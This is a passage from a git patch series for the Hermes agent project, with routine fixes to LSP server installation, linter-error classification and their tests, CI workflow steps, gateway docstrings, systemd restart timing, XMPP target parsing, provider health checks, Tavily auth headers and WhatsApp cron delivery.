+    extra_pkgs: Optional[list] = None,
+) -> Optional[str]:
     """Install an npm package into our staging dir.
 
     Uses ``npm install --prefix`` so the binaries land in
     ``<staging>/node_modules/.bin/<bin_name>`` and we symlink them up
     one level for direct PATH-style access.
+
+    ``extra_pkgs`` is a list of sibling packages to install in the
+    same ``node_modules`` tree.  Used for LSP servers with runtime
+    peer deps that npm doesn't auto-pull (typescript-language-server
+    needs ``typescript`` next to it; intelephense ships standalone).
     """
     npm = shutil.which("npm")
     if npm is None:
         logger.info("[install] cannot install %s: npm not on PATH", pkg)
         return None
     staging = hermes_lsp_bin_dir().parent  # <HERMES_HOME>/lsp/
+    install_targets = [pkg] + list(extra_pkgs or [])
     try:
-        logger.info("[install] npm install --prefix %s %s", staging, pkg)
+        logger.info(
+            "[install] npm install --prefix %s %s",
+            staging,
+            " ".join(install_targets),
+        )
         proc = subprocess.run(
-            [npm, "install", "--prefix", str(staging), "--silent", "--no-fund", "--no-audit", pkg],
+            [npm, "install", "--prefix", str(staging), "--silent", "--no-fund", "--no-audit", *install_targets],
             check=False,
             capture_output=True,
             text=True,
diff --git a/agent/lsp/servers.py b/agent/lsp/servers.py
index df919fba991..00ad4c40005 100644
--- a/agent/lsp/servers.py
+++ b/agent/lsp/servers.py
@@ -336,6 +336,9 @@ def _spawn_clangd(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
     )
 
 
+_BASH_SHELLCHECK_WARNED = False
+
+
 def _spawn_bash_ls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
     bin_path = _resolve_override(ctx, "bash-language-server") or _which("bash-language-server")
     if bin_path is None:
@@ -343,6 +346,18 @@ def _spawn_bash_ls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
         bin_path = try_install("bash-language-server", ctx.install_strategy)
         if bin_path is None:
             return None
+    # bash-language-server delegates diagnostics to ``shellcheck``.  Without
+    # it on PATH the server starts and accepts requests but never reports
+    # any problems — to the user it looks like a working integration that
+    # never finds bugs.  Warn once so the gap is visible.
+    global _BASH_SHELLCHECK_WARNED
+    if not _BASH_SHELLCHECK_WARNED and _which("shellcheck") is None:
+        _BASH_SHELLCHECK_WARNED = True
+        logger.warning(
+            "bash-language-server: shellcheck not found on PATH — "
+            "diagnostics will be empty until shellcheck is installed "
+            "(apt: shellcheck, brew: shellcheck, scoop: shellcheck)."
+        )
     return SpawnSpec(
         command=[bin_path, "start"],
         workspace_root=root,
diff --git a/tests/agent/lsp/test_install_and_lint_fixes.py b/tests/agent/lsp/test_install_and_lint_fixes.py
new file mode 100644
index 00000000000..9046d01295e
--- /dev/null
+++ b/tests/agent/lsp/test_install_and_lint_fixes.py
@@ -0,0 +1,279 @@
+"""Tests for follow-up fixes to the LSP integration (PR after #24168).
+
+Covers:
+
+1. ``typescript-language-server`` install recipe pulls in ``typescript``
+   alongside the server, so the npm install command targets both.
+2. ``hermes lsp status`` surfaces a ``Backend warnings`` section when
+   bash-language-server is installed but ``shellcheck`` is missing.
+3. ``_check_lint`` returns ``skipped`` (not ``error``) when the linter
+   command exists on PATH but couldn't actually run — e.g. ``npx tsc``
+   without the typescript SDK installed.  This is what unblocks the
+   LSP semantic tier on TypeScript files when the user doesn't also
+   have a project-level ``tsc``.
+"""
+from __future__ import annotations
+
+import io
+from contextlib import redirect_stdout
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from agent.lsp.install import INSTALL_RECIPES
+
+
+# ---------------------------------------------------------------------------
+# Fix 1: typescript install recipe carries the typescript SDK
+# ---------------------------------------------------------------------------
+
+
+def test_typescript_recipe_includes_typescript_sdk():
+    recipe = INSTALL_RECIPES["typescript-language-server"]
+    extras = recipe.get("extra_pkgs") or []
+    assert "typescript" in extras, (
+        "typescript-language-server requires the `typescript` SDK as a "
+        "sibling install — without it `initialize` fails with "
+        "'Could not find a valid TypeScript installation'."
+    )
+
+
+def test_install_npm_passes_extras_to_npm_command(tmp_path, monkeypatch):
+    """Verify the npm subprocess is invoked with both pkg AND extras."""
+    monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+
+    captured = {}
+
+    def fake_run(cmd, **kwargs):
+        captured["cmd"] = cmd
+        # Pretend npm succeeded but binary doesn't exist — install code
+        # will return None, which is fine for this test.
+        return MagicMock(returncode=0, stderr="")
+
+    from agent.lsp import install as install_mod
+
+    monkeypatch.setattr(install_mod.subprocess, "run", fake_run)
+    monkeypatch.setattr(install_mod.shutil, "which", lambda c: "/usr/bin/npm" if c == "npm" else None)
+
+    install_mod._install_npm("typescript-language-server", "typescript-language-server",
+                             extra_pkgs=["typescript"])
+
+    cmd = captured["cmd"]
+    assert "typescript-language-server" in cmd
+    assert "typescript" in cmd
+    # Both must come AFTER the npm flags, in install-target position
+    install_idx = cmd.index("install")
+    assert cmd.index("typescript-language-server") > install_idx
+    assert cmd.index("typescript") > install_idx
+
+
+def test_install_npm_works_without_extras(tmp_path, monkeypatch):
+    """Backwards compat: pyright-style recipes (no extras) still install."""
+    monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+
+    captured = {}
+
+    def fake_run(cmd, **kwargs):
+        captured["cmd"] = cmd
+        return MagicMock(returncode=0, stderr="")
+
+    from agent.lsp import install as install_mod
+
+    monkeypatch.setattr(install_mod.subprocess, "run", fake_run)
+    monkeypatch.setattr(install_mod.shutil, "which", lambda c: "/usr/bin/npm" if c == "npm" else None)
+
+    install_mod._install_npm("pyright", "pyright-langserver")
+
+    cmd = captured["cmd"]
+    assert "pyright" in cmd
+    # Should not blow up when extra_pkgs is omitted/None
+    install_targets = [c for c in cmd if not c.startswith("-") and c not in (
+        "install", "--prefix", str(install_mod.hermes_lsp_bin_dir().parent),
+        "/usr/bin/npm",
+    )]
+    assert install_targets == ["pyright"]
+
+
+# ---------------------------------------------------------------------------
+# Fix 2: ``hermes lsp status`` surfaces shellcheck-missing for bash
+# ---------------------------------------------------------------------------
+
+
+def test_backend_warnings_quiet_when_bash_not_installed(tmp_path, monkeypatch):
+    """No bash → no warning."""
+    monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+    from agent.lsp import cli as lsp_cli
+
+    with patch("shutil.which", return_value=None):
+        notes = lsp_cli._backend_warnings()
+    assert notes == []
+
+
+def test_backend_warnings_quiet_when_bash_and_shellcheck_both_present(tmp_path, monkeypatch):
+    """Both installed → no warning."""
+    monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+    from agent.lsp import cli as lsp_cli
+
+    def which(name):
+        return f"/usr/bin/{name}"  # both found
+
+    with patch("shutil.which", side_effect=which):
+        notes = lsp_cli._backend_warnings()
+    assert notes == []
+
+
+def test_backend_warnings_fires_when_bash_installed_but_shellcheck_missing(tmp_path, monkeypatch):
+    """The exact scenario from the bug report."""
+    monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+    from agent.lsp import cli as lsp_cli
+
+    def which(name):
+        if name == "bash-language-server":
+            return "/fake/bin/bash-language-server"
+        return None  # shellcheck missing
+
+    with patch("shutil.which", side_effect=which):
+        notes = lsp_cli._backend_warnings()
+    assert len(notes) == 1
+    assert "shellcheck" in notes[0].lower()
+    assert "bash-language-server" in notes[0].lower()
+
+
+def test_status_output_includes_backend_warnings_section(tmp_path, monkeypatch):
+    """End-to-end: status command output includes the warning section."""
+    monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+
+    # Pretend bash-language-server is installed but shellcheck is missing
+    def which(name):
+        if name == "bash-language-server":
+            return "/fake/bin/bash-language-server"
+        return None
+
+    from agent.lsp import cli as lsp_cli
+
+    buf = io.StringIO()
+    with patch("shutil.which", side_effect=which), redirect_stdout(buf):
+        lsp_cli._cmd_status(emit_json=False)
+
+    output = buf.getvalue()
+    assert "Backend warnings" in output
+    assert "shellcheck" in output
+
+
+# ---------------------------------------------------------------------------
+# Fix 3: tier-1 lint treats unusable linters as ``skipped``, not ``error``
+# ---------------------------------------------------------------------------
+
+
+def test_npx_tsc_missing_treated_as_skipped():
+    """The original bug: ``npx tsc`` errors when tsc isn't installed.
+
+    Without this fix, the lint result is ``error``, which means the LSP
+    semantic tier (gated on ``success or skipped``) is skipped — the user
+    gets a useless tooling-error message instead of real diagnostics.
+    """
+    from tools.file_operations import _looks_like_linter_unusable
+
+    npx_failure_output = (
+        "                                                                               \n"
+        "                This is not the tsc command you are looking for                \n"
+        "                                                                               \n"
+        "\n"
+        "To get access to the TypeScript compiler, tsc, from the command line either:\n"
+        "- Use npm install typescript to first add TypeScript to your project before using npx\n"
+    )
+
+    assert _looks_like_linter_unusable("npx", npx_failure_output) is True
+
+
+def test_real_lint_error_not_classified_as_unusable():
+    """A genuine TypeScript type error must NOT be misclassified."""
+    from tools.file_operations import _looks_like_linter_unusable
+
+    real_error = (
+        "bad.ts:5:1 - error TS2322: Type 'number' is not assignable to type 'string'.\n"
+        "5 const x: string = greet(42);\n"
+        "  ~~~~~~~~~~~~~~~\n"
+    )
+
+    assert _looks_like_linter_unusable("npx", real_error) is False
+
+
+def test_unknown_base_cmd_returns_false():
+    """Unfamiliar linters fall through and use the normal error path."""
+    from tools.file_operations import _looks_like_linter_unusable
+
+    assert _looks_like_linter_unusable("eslint", "any output") is False
+    assert _looks_like_linter_unusable("", "anything") is False
+
+
+def test_check_lint_returns_skipped_when_npx_tsc_unusable(tmp_path):
+    """Integration: _check_lint sees npx exit non-zero with the npx banner
+    and returns a ``skipped`` LintResult so LSP can still run."""
+    from tools.environments.local import LocalEnvironment
+    from tools.file_operations import ShellFileOperations
+
+    ts_file = tmp_path / "bad.ts"
+    ts_file.write_text("const x: string = 42;\n")
+
+    env = LocalEnvironment()
+    fops = ShellFileOperations(env)
+
+    # Patch _exec to simulate ``npx tsc`` failing because tsc is missing.
+    npx_banner = (
+        "                                                                               \n"
+        "                This is not the tsc command you are looking for                \n"
+    )
+
+    def fake_exec(cmd, **kwargs):
+        result = MagicMock()
+        result.exit_code = 1
+        result.stdout = npx_banner
+        return result
+
+    with patch.object(fops, "_exec", side_effect=fake_exec), \
+         patch.object(fops, "_has_command", return_value=True):
+        lint = fops._check_lint(str(ts_file))
+
+    assert lint.skipped is True, (
+        f"expected skipped (so LSP runs); got success={lint.success}, "
+        f"output={lint.output!r}"
+    )
+    assert "not usable" in (lint.message or "")
+
+
+def test_check_lint_returns_error_for_real_ts_type_errors(tmp_path):
+    """Sanity: real TypeScript errors still go through the error path."""
+    from tools.environments.local import LocalEnvironment
+    from tools.file_operations import ShellFileOperations
+
+    ts_file = tmp_path / "bad.ts"
+    ts_file.write_text("const x: string = 42;\n")
+
+    env = LocalEnvironment()
+    fops = ShellFileOperations(env)
+
+    real_tsc_error = (
+        "bad.ts:1:7 - error TS2322: Type 'number' is not assignable to type 'string'.\n"
+        "1 const x: string = 42;\n"
+        "        ~\n"
+        "Found 1 error.\n"
+    )
+
+    def fake_exec(cmd, **kwargs):
+        result = MagicMock()
+        result.exit_code = 1
+        result.stdout = real_tsc_error
+        return result
+
+    with patch.object(fops, "_exec", side_effect=fake_exec), \
+         patch.object(fops, "_has_command", return_value=True):
+        lint = fops._check_lint(str(ts_file))
+
+    assert lint.skipped is False
+    assert lint.success is False
+    assert "TS2322" in lint.output
+
+
+if __name__ == "__main__":  # pragma: no cover
+    pytest.main([__file__, "-v"])
diff --git a/tools/file_operations.py b/tools/file_operations.py
index f8b194b215c..4b64421622f 100644
--- a/tools/file_operations.py
+++ b/tools/file_operations.py
@@ -327,6 +327,55 @@ LINTERS = {
 }
 
 
+# Patterns that indicate the linter base command exists on PATH but
+# couldn't actually run — e.g. ``npx tsc`` when tsc isn't installed in
+# node_modules, or rustfmt complaining there's no Cargo project.  When
+# any of these substrings appears in the linter output, ``_check_lint``
+# returns ``skipped`` instead of ``error`` so:
+#
+# 1. The write isn't flagged for a tooling problem the agent can't fix.
+# 2. The LSP semantic tier still runs (it gates on success/skipped).
+#
+# Patterns are matched case-insensitively against linter stdout.
+_LINTER_UNUSABLE_PATTERNS = {
+    'npx': (
+        # npx prints this banner when the package isn't installed locally
+        # AND it can't auto-install (no internet, registry off, etc.) or
+        # when the binary it tried to run is the wrong one.
+        'this is not the tsc command you are looking for',
+        # npx with --no-install resolution failures
+        'could not determine executable to run',
+        'not found in npm registry',
+    ),
+    'rustfmt': (
+        # rustfmt outside a Cargo project
+        'no input filename given',
+        'error: not a workspace',
+    ),
+    'go': (
+        # ``go vet`` on a file outside a module / GOPATH
+        'cannot find package',
+        'go: cannot find main module',
+    ),
+}
+
+
+def _looks_like_linter_unusable(base_cmd: str, output: str) -> bool:
+    """Return True iff ``output`` from ``base_cmd`` indicates the linter
+    itself couldn't run (a tooling gap), as opposed to a real lint error
+    in the file being checked.
+
+    ``base_cmd`` is the first word of the linter command line (``npx``,
+    ``rustfmt``, ``go``, ...).  ``output`` is the stdout/stderr captured
+    from running it.
+    """
+    patterns = _LINTER_UNUSABLE_PATTERNS.get(base_cmd)
+    if not patterns:
+        return False
+    lower = output.lower()
+    return any(p in lower for p in patterns)
+
+
 def _lint_json_inproc(content: str) -> tuple[bool, str]:
     """In-process JSON syntax check.  Returns (ok, error_message)."""
     import json as _json
@@ -1117,6 +1166,24 @@ class ShellFileOperations(FileOperations):
         cmd = linter_cmd.replace("{file}", self._escape_shell_arg(path))
         result = self._exec(cmd, timeout=30)
 
+        if result.exit_code != 0 and _looks_like_linter_unusable(base_cmd, result.stdout):
+            # The linter command exists on PATH but couldn't actually run
+            # (e.g. ``npx tsc`` when tsc isn't in node_modules; ``rustfmt
+            # --check`` without a Cargo project).  This is a tooling gap,
+            # not a real lint failure — surface it as ``skipped`` so the
+            # write doesn't get flagged AND so the LSP tier still runs.
+            from tools.ansi_strip import strip_ansi
+            cleaned = strip_ansi(result.stdout).strip()
+            # Collapse to a single line — the npx banner is multi-line ASCII.
+            first_line = next(
+                (ln.strip() for ln in cleaned.splitlines() if ln.strip()),
+                cleaned[:120],
+            )
+            return LintResult(
+                skipped=True,
+                message=f"{base_cmd} not usable: {first_line[:200]}",
+            )
+
         return LintResult(
             success=result.exit_code == 0,
             output=result.stdout.strip() if result.stdout.strip() else ""

From a694a263309d1f2ae98fb938b76b013c2808cf35 Mon Sep 17 00:00:00 2001
From: wuwuzhijing <13216845+wuwuzhijing@users.noreply.github.com>
Date: Tue, 12 May 2026 17:08:35 -0700
Subject: [PATCH 52/59] docs(gateway): mention Weixin in gateway help and
 docstrings
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Salvage of #21063 — adds 'Weixin, and more' to module-level docstrings
in gateway/__init__.py, gateway/config.py, gateway/platforms/base.py
and the 'hermes gateway' subparser description.

Co-authored-by: wuwuzhijing <chuang.guo@hopechart.com>
---
 gateway/__init__.py       | 2 +-
 gateway/config.py         | 2 +-
 gateway/platforms/base.py | 2 +-
 hermes_cli/main.py        | 2 +-
 4 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/gateway/__init__.py b/gateway/__init__.py
index 8b6d988934a..140cc32fc5a 100644
--- a/gateway/__init__.py
+++ b/gateway/__init__.py
@@ -2,7 +2,7 @@
 Hermes Gateway - Multi-platform messaging integration.
 
 This module provides a unified gateway for connecting the Hermes agent
-to various messaging platforms (Telegram, Discord, WhatsApp) with:
+to various messaging platforms (Telegram, Discord, WhatsApp, Weixin, and more) with:
 - Session management (persistent conversations with reset policies)
 - Dynamic context injection (agent knows where messages come from)
 - Delivery routing (cron job outputs to appropriate channels)
diff --git a/gateway/config.py b/gateway/config.py
index 16e2662e819..11bc8b75a0b 100644
--- a/gateway/config.py
+++ b/gateway/config.py
@@ -2,7 +2,7 @@
 Gateway configuration management.
 
 Handles loading and validating configuration for:
-- Connected platforms (Telegram, Discord, WhatsApp)
+- Connected platforms (Telegram, Discord, WhatsApp, Weixin, and more)
 - Home channels for each platform
 - Session reset policies
 - Delivery preferences
diff --git a/gateway/platforms/base.py b/gateway/platforms/base.py
index 7026b55cf1b..0bf7b9a2ad9 100644
--- a/gateway/platforms/base.py
+++ b/gateway/platforms/base.py
@@ -1,7 +1,7 @@
 """
 Base platform adapter interface.
 
-All platform adapters (Telegram, Discord, WhatsApp) inherit from this
+All platform adapters (Telegram, Discord, WhatsApp, Weixin, and more) inherit from this
 and implement the required methods.
 """
 
diff --git a/hermes_cli/main.py b/hermes_cli/main.py
index c40158b761b..64310dc6af1 100644
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -9390,7 +9390,7 @@ def main():
     gateway_parser = subparsers.add_parser(
         "gateway",
         help="Messaging gateway management",
-        description="Manage the messaging gateway (Telegram, Discord, WhatsApp)",
+        description="Manage the messaging gateway (Telegram, Discord, WhatsApp, Weixin, and more)",
     )
     gateway_subparsers = gateway_parser.add_subparsers(dest="gateway_command")
 

From 1beb578fdeff23fbfade93cebae4c921473fe4ec Mon Sep 17 00:00:00 2001
From: wesleysimplicio <6108320+wesleysimplicio@users.noreply.github.com>
Date: Tue, 12 May 2026 17:09:32 -0700
Subject: [PATCH 53/59] fix(ci): install ripgrep in e2e job

Closes #22003
---
 .github/workflows/tests.yml | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
index a92afdfa40d..106be3ea232 100644
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -60,6 +60,9 @@ jobs:
       - name: Checkout code
         uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5  # v4
 
+      - name: Install system dependencies
+        run: sudo apt-get update && sudo apt-get install -y ripgrep
+
       - name: Install uv
         uses: astral-sh/setup-uv@d4b2f3b6ecc6e67c4457f6d3e41ec42d3d0fcb86  # v5
 

From 8d553056c0017a230228b4f43a66a254f27b3ff3 Mon Sep 17 00:00:00 2001
From: wesleysimplicio <6108320+wesleysimplicio@users.noreply.github.com>
Date: Tue, 12 May 2026 17:10:51 -0700
Subject: [PATCH 54/59] fix(ci): bump e2e job timeout to 15 minutes

Closes #22006
---
 .github/workflows/tests.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
index 106be3ea232..be14f14c80f 100644
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -55,7 +55,7 @@ jobs:
 
   e2e:
     runs-on: ubuntu-latest
-    timeout-minutes: 10
+    timeout-minutes: 15
     steps:
       - name: Checkout code
         uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5  # v4

From 0bc5f7b235117ccf791aab83b92164c0041d34af Mon Sep 17 00:00:00 2001
From: silv-mt-holdings <246958445+silv-mt-holdings@users.noreply.github.com>
Date: Tue, 12 May 2026 17:11:19 -0700
Subject: [PATCH 55/59] fix(gateway): reduce systemd restart delay

---
 hermes_cli/gateway.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/hermes_cli/gateway.py b/hermes_cli/gateway.py
index 5eaf715affa..b0cb579daa8 100644
--- a/hermes_cli/gateway.py
+++ b/hermes_cli/gateway.py
@@ -2164,7 +2164,7 @@ Environment="PATH={sane_path}"
 Environment="VIRTUAL_ENV={venv_dir}"
 Environment="HERMES_HOME={hermes_home}"
 Restart=always
-RestartSec=60
+RestartSec=5
 RestartMaxDelaySec=300
 RestartSteps=5
 RestartForceExitStatus={GATEWAY_SERVICE_RESTART_EXIT_CODE}
@@ -2199,7 +2199,7 @@ Environment="PATH={sane_path}"
 Environment="VIRTUAL_ENV={venv_dir}"
 Environment="HERMES_HOME={hermes_home}"
 Restart=always
-RestartSec=60
+RestartSec=5
 RestartMaxDelaySec=300
 RestartSteps=5
 RestartForceExitStatus={GATEWAY_SERVICE_RESTART_EXIT_CODE}

From a54d4b0e46429eb2d13bd41145c74c5e863d1e49 Mon Sep 17 00:00:00 2001
From: Quarkex <2879008+Quarkex@users.noreply.github.com>
Date: Tue, 12 May 2026 17:11:50 -0700
Subject: [PATCH 56/59] fix(send_message): recognize XMPP JIDs as explicit
 targets

_parse_target_ref() has no handler for XMPP JIDs (user@server or
room@conference.server), so they fall through to the final
`return None, None, False`. This causes send_message to fail when
targeting an XMPP chat by JID, since the JID is not numeric and
doesn't match any other platform pattern.

Add an explicit check for XMPP targets containing '@', matching the
existing Matrix pattern above it.
---
 tools/send_message_tool.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/tools/send_message_tool.py b/tools/send_message_tool.py
index c8d84fdf213..664c8736a12 100644
--- a/tools/send_message_tool.py
+++ b/tools/send_message_tool.py
@@ -355,6 +355,9 @@ def _parse_target_ref(platform_name: str, target_ref: str):
     # Matrix room IDs (start with !) and user IDs (start with @) are explicit
     if platform_name == "matrix" and (target_ref.startswith("!") or target_ref.startswith("@")):
         return target_ref, None, True
+    # XMPP JIDs (user@server or room@conference.server) are explicit
+    if platform_name == "xmpp" and "@" in target_ref:
+        return target_ref, None, True
     return None, None, False
 
 

From 0c233e70f84a7598f874d6a9b31898408717eabe Mon Sep 17 00:00:00 2001
From: jak983464779 <49120355+jak983464779@users.noreply.github.com>
Date: Tue, 12 May 2026 17:12:19 -0700
Subject: [PATCH 57/59] fix(doctor): skip /models health check for providers
 that don't support it

Xiaomi MiMo's /v1/models endpoint returns 401 even with a valid API key,
causing hermes doctor to falsely report 'invalid API key'.

Add a `supports_health_check` field to ProviderProfile (default True).
Providers whose /models endpoint doesn't support auth verification can
set it to False. The doctor's dynamic provider discovery now reads this
field instead of hardcoding True.

The xiaomi provider plugin sets supports_health_check=False.
---
 hermes_cli/doctor.py                       | 3 ++-
 plugins/model-providers/xiaomi/__init__.py | 1 +
 providers/base.py                          | 1 +
 3 files changed, 4 insertions(+), 1 deletion(-)

diff --git a/hermes_cli/doctor.py b/hermes_cli/doctor.py
index 529433902d5..a551d4d204e 100644
--- a/hermes_cli/doctor.py
+++ b/hermes_cli/doctor.py
@@ -287,7 +287,8 @@ def _build_apikey_providers_list() -> list:
                 (_pp.models_url or (_pp.base_url.rstrip("/") + "/models"))
                 if _pp.base_url else None
             )
-            _static.append((_label, _key_vars, _models_url, _base_var, True))
+            _hc = getattr(_pp, "supports_health_check", True)
+            _static.append((_label, _key_vars, _models_url, _base_var, _hc))
     except Exception:
         pass
     return _static
diff --git a/plugins/model-providers/xiaomi/__init__.py b/plugins/model-providers/xiaomi/__init__.py
index 2e0c8db7dbc..aed0d8424f8 100644
--- a/plugins/model-providers/xiaomi/__init__.py
+++ b/plugins/model-providers/xiaomi/__init__.py
@@ -8,6 +8,7 @@ xiaomi = ProviderProfile(
     aliases=("mimo", "xiaomi-mimo"),
     env_vars=("XIAOMI_API_KEY",),
     base_url="https://api.xiaomimimo.com/v1",
+    supports_health_check=False,  # /v1/models returns 401 even with valid key
 )
 
 register_provider(xiaomi)
diff --git a/providers/base.py b/providers/base.py
index 2c685f9b815..a9e76823bb2 100644
--- a/providers/base.py
+++ b/providers/base.py
@@ -40,6 +40,7 @@ class ProviderProfile:
     base_url: str = ""
     models_url: str = ""  # explicit models endpoint; falls back to {base_url}/models
     auth_type: str = "api_key"   # api_key|oauth_device_code|oauth_external|copilot|aws_sdk
+    supports_health_check: bool = True  # False → doctor skips /models probe for this provider
 
     # ── Model catalog ─────────────────────────────────────────
     # fallback_models: curated list shown in /model picker when live fetch fails.

From 6f92a21926f04f2235d5ecd06aa4ae38a327ccbc Mon Sep 17 00:00:00 2001
From: McClean <3732589+McClean@users.noreply.github.com>
Date: Tue, 12 May 2026 17:12:42 -0700
Subject: [PATCH 58/59] fix(web): add Bearer auth header for Tavily /crawl
 endpoint

Tavily's /crawl endpoint requires Authorization: Bearer <key> in the header,
unlike /search and /extract which accept api_key in the JSON body.
Without the header, crawl returns 401 Unauthorized.
---
 tools/web_tools.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/tools/web_tools.py b/tools/web_tools.py
index 401a34a5736..b9df0cd3be1 100644
--- a/tools/web_tools.py
+++ b/tools/web_tools.py
@@ -429,7 +429,9 @@ def _tavily_request(endpoint: str, payload: dict) -> dict:
     payload["api_key"] = api_key
     url = f"{_TAVILY_BASE_URL}/{endpoint.lstrip('/')}"
     logger.info("Tavily %s request to %s", endpoint, url)
-    response = httpx.post(url, json=payload, timeout=60)
+    # Tavily /crawl requires Bearer auth in header (body-only auth returns 401)
+    headers = {"Authorization": f"Bearer {api_key}"} if endpoint.strip("/") == "crawl" else {}
+    response = httpx.post(url, json=payload, headers=headers, timeout=60)
     response.raise_for_status()
     return response.json()
 

From d8c4460fe35e9a471b8b115b73c39527e5492477 Mon Sep 17 00:00:00 2001
From: dhruv-saxena <6254307+dhruv-saxena@users.noreply.github.com>
Date: Tue, 12 May 2026 17:13:08 -0700
Subject: [PATCH 59/59] fix(cron): include whatsapp in _HOME_TARGET_ENV_VARS
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Cron jobs using `deliver: whatsapp` were silently dropped because the
resolver's home-channel env var dict in cron/scheduler.py listed every
messaging platform except whatsapp. _resolve_delivery_targets() returned
[] and no message was sent — but jobs.json marked the run successful and
no log line surfaced the failure.

The gateway adapter and the send_message tool path both honored
WHATSAPP_HOME_CHANNEL correctly; only the cron path missed.

Adds 'whatsapp' -> 'WHATSAPP_HOME_CHANNEL' to _HOME_TARGET_ENV_VARS.
Verified end-to-end with multiple cron pings landing in WhatsApp
self-chat after the fix.

Fixes #22997
---
 cron/scheduler.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/cron/scheduler.py b/cron/scheduler.py
index 7e39df578bb..b585ef2e42b 100644
--- a/cron/scheduler.py
+++ b/cron/scheduler.py
@@ -111,6 +111,7 @@ _HOME_TARGET_ENV_VARS = {
     "weixin": "WEIXIN_HOME_CHANNEL",
     "bluebubbles": "BLUEBUBBLES_HOME_CHANNEL",
     "qqbot": "QQBOT_HOME_CHANNEL",
+    "whatsapp": "WHATSAPP_HOME_CHANNEL",
 }
 
 # Legacy env var names kept for back-compat.  Each entry is the current